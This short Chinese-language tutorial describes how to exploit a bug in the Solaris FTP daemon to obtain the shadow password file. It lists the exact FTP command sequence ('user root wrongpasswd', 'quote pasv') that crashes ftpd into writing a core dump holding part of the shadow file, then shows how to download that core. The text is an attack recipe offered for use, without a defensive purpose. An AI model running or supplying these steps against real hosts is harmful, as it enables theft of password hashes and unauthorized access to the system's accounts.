如何用FIP获取shadow口令文件

该方法利用了Solaris 操作系统中FTPD的一个BUG，使得用户可以获得该机的口令文件。具体过程如下： 1.通过 ftp 正常登录到目的主机上 2.输入如下命令序列： ftp> user root wrongpasswd ftp> quote pasv 3.这时，ftpd会报错退出，同时会在当前目录下生成一个core，口令文件就包含在这个core中。 4.再次进入FTP >get core 补充：虽然在core只有一部分shadow，但是对于系统来说已经是致命的打击了。